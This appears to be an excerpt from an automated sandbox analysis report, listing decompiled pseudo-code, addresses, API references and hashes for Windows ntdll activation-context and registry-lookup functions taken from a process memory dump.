                                                                                                                            0x6b20c9aa
                                                                                                                            0x6b20c9ab
                                                                                                                            0x6b20c9ac
                                                                                                                            0x6b20c9ae
                                                                                                                            0x6b20c9b4
                                                                                                                            0x00000000
                                                                                                                            0x6b20c9b4
                                                                                                                            0x6b24a851
                                                                                                                            0x00000000
                                                                                                                            0x6b24a851
                                                                                                                            0x6b24a824
                                                                                                                            0x00000000
                                                                                                                            0x6b24a824
                                                                                                                            0x6b20c96b
                                                                                                                            0x6b20c971
                                                                                                                            0x6b20c978
                                                                                                                            0x00000000
                                                                                                                            0x6b20c978
                                                                                                                            0x6b20c863
                                                                                                                            0x6b20c7f9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20c802
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20c804
                                                                                                                            0x6b20c804
                                                                                                                            0x6b20c807
                                                                                                                            0x6b20c80b
                                                                                                                            0x6b24a801
                                                                                                                            0x00000000
                                                                                                                            0x6b24a801
                                                                                                                            0x6b20c814
                                                                                                                            0x6b20c816
                                                                                                                            0x00000000
                                                                                                                            0x6b20c816

                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,?,?,00000002), ref: 6B20C8BF
                                                                                                                            • memcpy.1105(00000000,?,0000022C,E850CF8B,?,?,00000002), ref: 6B20C981
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() passed the empty activation context,RtlpGetActivationContextDataStorageMapAndRosterHeader,?,?,00000002), ref: 6B24A7EF
                                                                                                                            Strings
                                                                                                                            • .Local, xrefs: 6B20C9A4
                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 6B24A7E1, 6B24A8B9
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 6B24A8BE
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 6B24A7E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeapPrintmemcpy
                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                            • API String ID: 3847278171-1239276146
                                                                                                                            • Opcode ID: 719597d73042229d17f031141f2b06f7d802aa7f09214e6f1094e0d68a09d811
                                                                                                                            • Instruction ID: 13b59d0913f6f2119a100a8e2393e9441af4feaf9af96eabc585115442b8a528
                                                                                                                            • Opcode Fuzzy Hash: 719597d73042229d17f031141f2b06f7d802aa7f09214e6f1094e0d68a09d811
                                                                                                                            • Instruction Fuzzy Hash: C3A1B17194422EEBDB25CF64C8C4B99B3F5AF59714F1005E9D818A7290DB389E81CFA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B210F48, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 188nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 74%
                                                                                                                            			E6B210F48(signed short* __ecx, long* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed short* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed short _v36;
				signed int _v40;
				long* _v48;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				intOrPtr _v60;
				void* _v64;
				void* _t60;
				void* _t66;
				void* _t69;
				void* _t72;
				intOrPtr _t87;
				char _t93;
				signed int* _t95;
				intOrPtr _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t107;
				signed short _t109;
				char _t110;
				intOrPtr _t111;
				intOrPtr* _t114;
				intOrPtr _t116;
				void* _t117;
				signed int _t118;
				void* _t120;

				_t120 = (_t118 & 0xfffffff8) - 0x3c;
				_v48 = __edx;
				_t87 = _a4;
				 *_a8 = 0;
				_t107 =  *__ecx & 0x0000ffff;
				_v52 = 0;
				_v56 = 0;
				_v57 = 0;
				_t101 = _t107;
				_t114 = __ecx[2] + _t101;
				_v40 = __ecx;
				if(_t87 != 0) {
					if(_t101 + 2 > (__ecx[1] & 0x0000ffff)) {
						L28:
						_t60 = 0xc000000d;
						goto L16;
					}
					_t93 = 0;
					if( *_t114 == 0) {
						goto L2;
					}
					goto L28;
				} else {
					_t93 = 0;
					L2:
					if(_t101 == 0) {
						L7:
						_t109 = _t107 - _t101;
						_v32 = _t114;
						_v36 = _t109;
						if((_t109 & 0x0000ffff) != _t109) {
							_t60 = 0xc0000023;
							L16:
							return _t60;
						}
						if(_t87 != 0) {
							_t116 = _v48;
							_v58 = 1;
							_t60 = E6B2110D7( &_v52, _t116, _t87);
						} else {
							_v58 = _t93;
							_t60 = E6B21108B( &_v52);
							_t116 = _v48;
						}
						if(_t60 < 0) {
							goto L16;
						} else {
							_t110 = _v52;
							_v20 =  &_v36;
							_v28 = 0x18;
							_v24 = _t110;
							_v16 = 0x240;
							_v12 = 0;
							_v8 = 0;
							if(_t87 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push( &_v28);
								_push(_t116);
								_push( &_v56);
								_t66 = E6B2196D0();
							} else {
								_push( &_v28);
								_push(_t116);
								_push( &_v56);
								_t66 = E6B219600();
							}
							_t117 = _t66;
							if(_v58 != 0) {
								_push(_t110);
								E6B2195D0();
							}
							if(_t117 >= 0) {
								_t95 =  &_v52;
								_v52 = _v56;
								_t69 = E6B1D8239(_t95, _v48, _v40);
								_t111 = _v56;
								_t117 = _t69;
								if(_t117 < 0) {
									L24:
									if(_t111 != 0) {
										_push(_t111);
										E6B2195D0();
									}
									goto L15;
								}
								_t104 = _v56;
								if(_v57 != 0 && _t111 == _t104 && _t87 != 0) {
									_push(_t95);
									_v52 = 0;
									_t72 = E6B268372( &_v52, _t104, _v48);
									_t111 = _v60;
									_t117 = _t72;
									if(_t117 >= 0) {
										_t117 = E6B1E6D30( &_v52, L"FilterFullPath");
										if(_t117 >= 0) {
											_t97 =  *((intOrPtr*)(_t120 + 0x24));
											_push( *(_t97 + 2) & 0x0000ffff);
											_push( *((intOrPtr*)(_t97 + 4)));
											_push(1);
											_push(0);
											_push( &_v52);
											_push(_t111);
											_t117 = E6B219B00();
											if(_t117 >= 0) {
												 *((intOrPtr*)(_t120 + 0x28)) = 1;
												_t117 = E6B1E6D30( &_v52, L"UseFilter");
												if(_t117 >= 0) {
													_push(4);
													_push(_t120 + 0x28);
													_push(4);
													_push(0);
													_push( &_v52);
													_push(_v60);
													_t117 = E6B219B00();
												}
											}
										}
									}
									_push(_v60);
									E6B2195D0();
								}
								if(_t117 < 0) {
									goto L24;
								} else {
									 *_a8 = _t111;
									goto L15;
								}
							} else {
								L15:
								_t60 = _t117;
								goto L16;
							}
						}
					}
					L3:
					L3:
					if( *((short*)(_t114 - 2)) == 0x5c) {
						_v57 = 1;
					} else {
						goto L4;
					}
					goto L7;
					L4:
					_t114 = _t114 + 0xfffffffe;
					_t101 = _t101;
					if(_t101 != 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
			}






































                                                                                                                            0x6b210f50
                                                                                                                            0x6b210f55
                                                                                                                            0x6b210f5f
                                                                                                                            0x6b210f63
                                                                                                                            0x6b210f69
                                                                                                                            0x6b210f6c
                                                                                                                            0x6b210f70
                                                                                                                            0x6b210f74
                                                                                                                            0x6b210f78
                                                                                                                            0x6b210f7a
                                                                                                                            0x6b210f7c
                                                                                                                            0x6b210f82
                                                                                                                            0x6b24cc82
                                                                                                                            0x6b24cc8f
                                                                                                                            0x6b24cc8f
                                                                                                                            0x00000000
                                                                                                                            0x6b24cc8f
                                                                                                                            0x6b24cc84
                                                                                                                            0x6b24cc89
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b210f88
                                                                                                                            0x6b210f88
                                                                                                                            0x6b210f8a
                                                                                                                            0x6b210f8c
                                                                                                                            0x6b210fa5
                                                                                                                            0x6b210fa5
                                                                                                                            0x6b210fa7
                                                                                                                            0x6b210fae
                                                                                                                            0x6b210fb5
                                                                                                                            0x6b24cc99
                                                                                                                            0x6b211029
                                                                                                                            0x6b21102f
                                                                                                                            0x6b21102f
                                                                                                                            0x6b210fbd
                                                                                                                            0x6b24cca3
                                                                                                                            0x6b24ccae
                                                                                                                            0x6b24ccb3
                                                                                                                            0x6b210fc3
                                                                                                                            0x6b210fc3
                                                                                                                            0x6b210fcb
                                                                                                                            0x6b210fd0
                                                                                                                            0x6b210fd0
                                                                                                                            0x6b210fd6
                                                                                                                            0x00000000
                                                                                                                            0x6b210fd8
                                                                                                                            0x6b210fd8
                                                                                                                            0x6b210fe0
                                                                                                                            0x6b210fe6
                                                                                                                            0x6b210fee
                                                                                                                            0x6b210ff2
                                                                                                                            0x6b210ffa
                                                                                                                            0x6b210ffe
                                                                                                                            0x6b211004
                                                                                                                            0x6b24ccbd
                                                                                                                            0x6b24ccbe
                                                                                                                            0x6b24ccbf
                                                                                                                            0x6b24ccc0
                                                                                                                            0x6b24ccc5
                                                                                                                            0x6b24ccc6
                                                                                                                            0x6b24cccb
                                                                                                                            0x6b24cccc
                                                                                                                            0x6b21100a
                                                                                                                            0x6b21100e
                                                                                                                            0x6b21100f
                                                                                                                            0x6b211014
                                                                                                                            0x6b211015
                                                                                                                            0x6b211015
                                                                                                                            0x6b21101f
                                                                                                                            0x6b211021
                                                                                                                            0x6b211077
                                                                                                                            0x6b211078
                                                                                                                            0x6b211078
                                                                                                                            0x6b211025
                                                                                                                            0x6b211036
                                                                                                                            0x6b211042
                                                                                                                            0x6b211046
                                                                                                                            0x6b21104b
                                                                                                                            0x6b21104f
                                                                                                                            0x6b211053
                                                                                                                            0x6b21107f
                                                                                                                            0x6b211081
                                                                                                                            0x6b211083
                                                                                                                            0x6b211084
                                                                                                                            0x6b211084
                                                                                                                            0x00000000
                                                                                                                            0x6b211081
                                                                                                                            0x6b21105a
                                                                                                                            0x6b21105e
                                                                                                                            0x6b24ccd6
                                                                                                                            0x6b24cce1
                                                                                                                            0x6b24cce5
                                                                                                                            0x6b24ccea
                                                                                                                            0x6b24ccee
                                                                                                                            0x6b24ccf2
                                                                                                                            0x6b24cd03
                                                                                                                            0x6b24cd07
                                                                                                                            0x6b24cd09
                                                                                                                            0x6b24cd11
                                                                                                                            0x6b24cd12
                                                                                                                            0x6b24cd19
                                                                                                                            0x6b24cd1b
                                                                                                                            0x6b24cd1c
                                                                                                                            0x6b24cd1d
                                                                                                                            0x6b24cd23
                                                                                                                            0x6b24cd27
                                                                                                                            0x6b24cd32
                                                                                                                            0x6b24cd40
                                                                                                                            0x6b24cd44
                                                                                                                            0x6b24cd46
                                                                                                                            0x6b24cd4c
                                                                                                                            0x6b24cd4d
                                                                                                                            0x6b24cd4f
                                                                                                                            0x6b24cd54
                                                                                                                            0x6b24cd55
                                                                                                                            0x6b24cd5e
                                                                                                                            0x6b24cd5e
                                                                                                                            0x6b24cd44
                                                                                                                            0x6b24cd27
                                                                                                                            0x6b24cd07
                                                                                                                            0x6b24cd60
                                                                                                                            0x6b24cd64
                                                                                                                            0x6b24cd64
                                                                                                                            0x6b21106e
                                                                                                                            0x00000000
                                                                                                                            0x6b211070
                                                                                                                            0x6b211073
                                                                                                                            0x00000000
                                                                                                                            0x6b211073
                                                                                                                            0x6b211027
                                                                                                                            0x6b211027
                                                                                                                            0x6b211027
                                                                                                                            0x00000000
                                                                                                                            0x6b211027
                                                                                                                            0x6b211025
                                                                                                                            0x6b210fd6
                                                                                                                            0x00000000
                                                                                                                            0x6b210f8e
                                                                                                                            0x6b210f93
                                                                                                                            0x6b210fa0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b210f95
                                                                                                                            0x6b210f95
                                                                                                                            0x6b210f99
                                                                                                                            0x6b210f9c
                                                                                                                            0x00000000
                                                                                                                            0x6b210f9e
                                                                                                                            0x00000000
                                                                                                                            0x6b210f9e
                                                                                                                            0x6b210f9c

                                                                                                                            APIs
                                                                                                                            • ZwOpenKey.1105(?,?,00000018), ref: 6B211015
                                                                                                                            • ZwClose.1105(?,?,?,00000018), ref: 6B211078
                                                                                                                            • ZwClose.1105(?,?,?,?,?,00000018), ref: 6B211084
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$Open
                                                                                                                            • String ID: FilterFullPath$UseFilter
                                                                                                                            • API String ID: 2976201327-4106802152
                                                                                                                            • Opcode ID: 49d28a35762c4c76276cbb84badbde772469ec946b0c60528ff0c86dcb870629
                                                                                                                            • Instruction ID: 6743ee533c7643c0e26b8508683ab490689b1c967fed30cc0ed7198ff952f10c
                                                                                                                            • Opcode Fuzzy Hash: 49d28a35762c4c76276cbb84badbde772469ec946b0c60528ff0c86dcb870629
                                                                                                                            • Instruction Fuzzy Hash: FB61147190C75A9BD300CF28C481A6BBBE8AF99B54F04491EFEC497250E739D949C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F2D50, Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 397COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E6B1F2D50(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				char _v89;
				void* _v96;
				void* _v100;
				void* _v113;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t131;
				signed int _t134;
				intOrPtr _t139;
				void* _t140;
				signed int _t150;
				signed int _t156;
				intOrPtr* _t167;
				intOrPtr _t168;
				signed int _t169;
				void* _t174;
				intOrPtr _t175;
				signed int _t176;
				void* _t177;
				intOrPtr _t179;
				signed int _t180;
				signed int _t184;
				intOrPtr _t189;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr _t210;
				signed int _t211;
				void* _t212;
				void* _t224;
				intOrPtr _t226;
				signed int _t227;
				void* _t228;
				void* _t230;
				signed int _t231;
				signed int _t232;
				void* _t233;
				signed int _t237;
				signed int _t239;

				_t239 = (_t237 & 0xfffffff8) - 0x44;
				_v8 =  *0x6b2cd360 ^ _t239;
				_t184 =  *[fs:0x18];
				_t131 =  *((intOrPtr*)(_t184 + 0x30));
				if( *((intOrPtr*)(_t131 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t131 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t132 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v12 = 0xffffffff;
					_v16 = 0;
					if(_a16 == 0) {
						L81:
						_t132 = 0xc000000d;
						goto L33;
					} else {
						_t222 = _a4;
						if((_t222 & 0xfffffff8) != 0) {
							goto L81;
						} else {
							_t134 = _a20;
							if((_t222 & 0x00000007) == 0) {
								if(_t134 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t134 == 0) {
									goto L81;
								} else {
									L5:
									if( *_t134 < 0x24) {
										goto L81;
									} else {
										L6:
										if((_t222 & 0x00000002) == 0) {
											L9:
											if((_t222 & 0x00000004) != 0) {
												if(_t134 + 0x40 <=  *_t134 + _t134) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L80;
												}
											} else {
												L10:
												_t231 = _a8;
												_v36 = _t222;
												_t222 =  *[fs:0x18];
												_v28 = _a12;
												_v24 = 0;
												_t175 = _v24;
												_t189 =  *((intOrPtr*)(_t222 + 0x30));
												_v40 = 0x18;
												_v20 = 0;
												_v32 = _t231;
												_v64 = 0;
												_v60 = _t222;
												_v52 = _t189;
												while(1) {
													_t139 = _t175;
													if(_t139 != 0) {
														goto L34;
													}
													_t167 =  *((intOrPtr*)(_t222 + 0x1a8));
													if(_t167 == 0) {
														L14:
														_t226 =  *((intOrPtr*)(_t189 + 0x1f8));
														_v64 = 0;
														if(_t226 == 0) {
															L36:
															_t226 =  *((intOrPtr*)(_t189 + 0x200));
															_v64 = 0xfffffffc;
															if(_t226 == 0) {
																L86:
																if(_t175 <= 3) {
																	goto L16;
																} else {
																	_t132 = 0xc00000e5;
																	goto L89;
																}
															} else {
																_t175 = 3;
																_v24 = 3;
																goto L16;
															}
														} else {
															_t175 = 2;
															_v24 = 2;
															goto L16;
														}
													} else {
														_t168 =  *_t167;
														if(_t168 != 0) {
															_t169 =  *((intOrPtr*)(_t168 + 4));
															_v64 = _t169;
															if(_t169 == 0) {
																L58:
																if(_t226 == 0) {
																	goto L14;
																} else {
																	goto L59;
																}
															} else {
																if(_t169 == 0xfffffffc) {
																	_t226 =  *((intOrPtr*)(_t189 + 0x200));
																	goto L58;
																} else {
																	if(_t169 == 0xfffffffd) {
																		_t226 = "Actx ";
																		L59:
																		_t175 = 1;
																		_v24 = 1;
																		L16:
																		if(_t226 == 0) {
																			_t132 = 0xc0150001;
																			L89:
																			_t232 = 0;
																			goto L90;
																		} else {
																			_t222 = _t231;
																			_t132 = E6B1F31F0(_t226, _t231, _a12,  &_v56,  &_v48);
																			if(_t132 < 0) {
																				_t232 = 0;
																				if(_t132 != 0xc0150001 || _t175 == 3) {
																					goto L19;
																				} else {
																					_t189 = _v52;
																					_t222 = _v60;
																					_t231 = _a8;
																					continue;
																				}
																			} else {
																				_t222 = _v64;
																				_v20 = (0 | _t222 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t222 == 0x00000000;
																				asm("sbb esi, esi");
																				_t232 =  ~(_t222 - 0xfffffffc) & _t222;
																				_t132 = 0;
																				L19:
																				if(_t132 < 0) {
																					L90:
																					if(_t132 < 0) {
																						goto L33;
																					} else {
																						goto L20;
																					}
																				} else {
																					L20:
																					_t176 = _v48;
																					if(_t176 < 0x2c) {
																						L104:
																						_t142 = _v56;
																						goto L105;
																					} else {
																						_t227 = _a20;
																						while(1) {
																							L22:
																							_t142 = _v56;
																							if( *_v56 != 0x64487353) {
																								break;
																							}
																							_t239 = _t239 - 8;
																							_t222 = _t176;
																							_push( &_v16);
																							_push( &_v12);
																							_push(_t227);
																							_push(_a16);
																							_t132 = E6B1F3360(_t142, _t176);
																							if(_t132 >= 0) {
																								_t85 = _t232 - 1; // -1
																								if((_t85 | 0x00000007) != 0xffffffff) {
																									_t150 =  *(_t232 + 0x14);
																									 *(_t239 + 0x28) = _t150;
																									if(_t150 != 0 && (( *(_t232 + 0x1c) & 0x00000008) == 0 || ( *(_t232 + 0x3c) & 0x00000008) == 0)) {
																										 *((char*)(_t239 + 0x13)) = 0;
																										 *0x6b2cb1e0(3, _t232,  *((intOrPtr*)(_t232 + 0x10)),  *((intOrPtr*)(_t232 + 0x18)), 0, _t239 + 0x13);
																										 *((intOrPtr*)(_t239 + 0x40))();
																										 *(_t232 + 0x1c) =  *(_t232 + 0x1c) | 0x00000008;
																										if(_v89 != 0) {
																											 *(_t232 + 0x3c) =  *(_t232 + 0x3c) | 0x00000008;
																										}
																									}
																								}
																								if(_t227 == 0) {
																									L66:
																									_pop(_t228);
																									_pop(_t233);
																									_pop(_t177);
																									return E6B21B640(0, _t177, _v8 ^ _t239, _t222, _t228, _t233);
																								} else {
																									_t148 = _v56;
																									_t222 = _t227;
																									if(E6B1FFD1F(_a4, _t227, _t232,  &_v40, _v56,  *((intOrPtr*)(_v56 + 0x24)),  *((intOrPtr*)(_t148 + 0x28)), _t176) < 0) {
																										goto L33;
																									} else {
																										goto L66;
																									}
																								}
																							} else {
																								if(_t132 != 0xc0150008) {
																									L33:
																									_pop(_t224);
																									_pop(_t230);
																									_pop(_t174);
																									return E6B21B640(_t132, _t174, _v8 ^ _t239, _t222, _t224, _t230);
																								} else {
																									_t222 =  *[fs:0x18];
																									_t232 = 0;
																									_v64 = 0;
																									 *(_t239 + 0x28) = _t222;
																									_v60 = 0;
																									_v52 =  *((intOrPtr*)(_t222 + 0x30));
																									_t179 = _v24;
																									L26:
																									while(1) {
																										if(_t179 <= 2) {
																											_t200 = _t179 - _t232;
																											if(_t200 == 0) {
																												_t201 =  *((intOrPtr*)(_t222 + 0x1a8));
																												if(_t201 == 0) {
																													goto L67;
																												} else {
																													_t210 =  *_t201;
																													if(_t210 == 0) {
																														goto L67;
																													} else {
																														_t211 =  *((intOrPtr*)(_t210 + 4));
																														_v60 = _t211;
																														if(_t211 == 0) {
																															L101:
																															if(_t156 == 0) {
																																goto L67;
																															} else {
																																goto L102;
																															}
																														} else {
																															if(_t211 != 0xfffffffc) {
																																if(_t211 != 0xfffffffd) {
																																	_t156 =  *(_t211 + 0x10);
																																	goto L100;
																																} else {
																																	_t156 = "Actx ";
																																	_v64 = _t156;
																																	L102:
																																	_t179 = 1;
																																	_v24 = 1;
																																	goto L28;
																																}
																															} else {
																																_t156 =  *(_v52 + 0x200);
																																L100:
																																_v64 = _t156;
																																goto L101;
																															}
																														}
																													}
																												}
																											} else {
																												_t212 = _t200 - 1;
																												if(_t212 == 0) {
																													L67:
																													_v60 = 0;
																													_t156 =  *(_v52 + 0x1f8);
																													_v64 = _t156;
																													if(_t156 == 0) {
																														goto L44;
																													} else {
																														_t179 = 2;
																														_v24 = 2;
																														goto L28;
																													}
																												} else {
																													if(_t212 != 1) {
																														goto L27;
																													} else {
																														L44:
																														_v60 = 0xfffffffc;
																														_t156 =  *(_v52 + 0x200);
																														_v64 = _t156;
																														if(_t156 == 0) {
																															goto L27;
																														} else {
																															_t179 = 3;
																															_v24 = 3;
																															goto L28;
																														}
																													}
																												}
																											}
																										} else {
																											L27:
																											if(_t179 > 3) {
																												_t132 = 0xc00000e5;
																												goto L30;
																											} else {
																												L28:
																												if(_t156 != 0) {
																													_t222 = _a8;
																													_t132 = E6B1F31F0(_t156, _a8, _a12,  &_v56,  &_v48);
																													if(_t132 < 0) {
																														if(_t132 != 0xc0150001 || _t179 == 3) {
																															_t180 = 0;
																															goto L48;
																														} else {
																															_t156 = _v64;
																															_t222 =  *(_t239 + 0x28);
																															continue;
																														}
																													} else {
																														_t222 = _v60;
																														_v20 = (0 | _t222 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t222 == 0x00000000;
																														asm("sbb ebx, ebx");
																														_t180 =  ~(_t222 - 0xfffffffc) & _t222;
																														_t132 = 0;
																														L48:
																														if(_t132 < 0) {
																															goto L31;
																														} else {
																															E6B1FF830(_t132, _t180);
																															_t232 = _t180;
																															goto L50;
																														}
																													}
																												} else {
																													_t132 = 0xc0150001;
																													L30:
																													if(_t132 >= 0) {
																														L50:
																														_t176 = _v48;
																														if(_t176 >= 0x2c) {
																															goto L22;
																														} else {
																															goto L104;
																														}
																													} else {
																														L31:
																														if(_t132 == 0xc0150001) {
																															_t132 = 0xc0150008;
																														}
																														goto L33;
																													}
																												}
																											}
																										}
																										goto L106;
																									}
																								}
																							}
																							goto L106;
																						}
																						L105:
																						_push(_t176);
																						E6B265720(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t142);
																						_t239 = _t239 + 0x14;
																						_t132 = 0xc0150003;
																						goto L33;
																					}
																				}
																			}
																		}
																	} else {
																		_t226 =  *((intOrPtr*)(_t169 + 0x10));
																		goto L58;
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L106;
													L34:
													_t140 = _t139 - 1;
													if(_t140 == 0) {
														goto L14;
													} else {
														if(_t140 != 1) {
															goto L86;
														} else {
															goto L36;
														}
													}
													goto L106;
												}
											}
										} else {
											if(_t134 + 0x2c >  *_t134 + _t134) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L80:
												_push(0);
												_push(0x33);
												E6B265720();
												_t239 = _t239 + 0x14;
												goto L81;
											} else {
												_t134 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L106:
			}






























































                                                                                                                            0x6b1f2d58
                                                                                                                            0x6b1f2d62
                                                                                                                            0x6b1f2d66
                                                                                                                            0x6b1f2d70
                                                                                                                            0x6b1f2d7a
                                                                                                                            0x6b1f30ad
                                                                                                                            0x00000000
                                                                                                                            0x6b23d710
                                                                                                                            0x6b23d710
                                                                                                                            0x00000000
                                                                                                                            0x6b23d710
                                                                                                                            0x6b1f2d80
                                                                                                                            0x6b1f2d80
                                                                                                                            0x6b1f2d84
                                                                                                                            0x6b1f2d8c
                                                                                                                            0x6b1f2d94
                                                                                                                            0x6b1f2d9c
                                                                                                                            0x6b23d735
                                                                                                                            0x6b23d735
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2da2
                                                                                                                            0x6b1f2da2
                                                                                                                            0x6b1f2dab
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2db1
                                                                                                                            0x6b1f2db1
                                                                                                                            0x6b1f2db7
                                                                                                                            0x6b1f31d4
                                                                                                                            0x00000000
                                                                                                                            0x6b1f31da
                                                                                                                            0x00000000
                                                                                                                            0x6b1f31da
                                                                                                                            0x6b1f2dbd
                                                                                                                            0x6b1f2dbf
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2dc5
                                                                                                                            0x6b1f2dc5
                                                                                                                            0x6b1f2dc8
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2dce
                                                                                                                            0x6b1f2dce
                                                                                                                            0x6b1f2dd1
                                                                                                                            0x6b1f2de5
                                                                                                                            0x6b1f2de8
                                                                                                                            0x6b23d748
                                                                                                                            0x00000000
                                                                                                                            0x6b23d74e
                                                                                                                            0x6b23d74e
                                                                                                                            0x6b23d753
                                                                                                                            0x6b23d758
                                                                                                                            0x00000000
                                                                                                                            0x6b23d758
                                                                                                                            0x6b1f2dee
                                                                                                                            0x6b1f2dee
                                                                                                                            0x6b1f2df3
                                                                                                                            0x6b1f2df6
                                                                                                                            0x6b1f2dfa
                                                                                                                            0x6b1f2e01
                                                                                                                            0x6b1f2e07
                                                                                                                            0x6b1f2e0f
                                                                                                                            0x6b1f2e13
                                                                                                                            0x6b1f2e16
                                                                                                                            0x6b1f2e1e
                                                                                                                            0x6b1f2e26
                                                                                                                            0x6b1f2e2a
                                                                                                                            0x6b1f2e2e
                                                                                                                            0x6b1f2e32
                                                                                                                            0x6b1f2e40
                                                                                                                            0x6b1f2e42
                                                                                                                            0x6b1f2e45
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2e4b
                                                                                                                            0x6b1f2e53
                                                                                                                            0x6b1f2e5f
                                                                                                                            0x6b1f2e5f
                                                                                                                            0x6b1f2e67
                                                                                                                            0x6b1f2e6d
                                                                                                                            0x6b1f2fa9
                                                                                                                            0x6b1f2fa9
                                                                                                                            0x6b1f2faf
                                                                                                                            0x6b1f2fb9
                                                                                                                            0x6b23d774
                                                                                                                            0x6b23d777
                                                                                                                            0x00000000
                                                                                                                            0x6b23d77d
                                                                                                                            0x6b23d77d
                                                                                                                            0x00000000
                                                                                                                            0x6b23d77d
                                                                                                                            0x6b1f2fbf
                                                                                                                            0x6b1f2fbf
                                                                                                                            0x6b1f2fc4
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2fc4
                                                                                                                            0x6b1f2e73
                                                                                                                            0x6b1f2e73
                                                                                                                            0x6b1f2e78
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2e78
                                                                                                                            0x6b1f2e55
                                                                                                                            0x6b1f2e55
                                                                                                                            0x6b1f2e59
                                                                                                                            0x6b1f30b8
                                                                                                                            0x6b1f30bb
                                                                                                                            0x6b1f30c1
                                                                                                                            0x6b1f30d8
                                                                                                                            0x6b1f30da
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f30c3
                                                                                                                            0x6b1f30c6
                                                                                                                            0x6b23d75f
                                                                                                                            0x00000000
                                                                                                                            0x6b1f30cc
                                                                                                                            0x6b1f30cf
                                                                                                                            0x6b23d76a
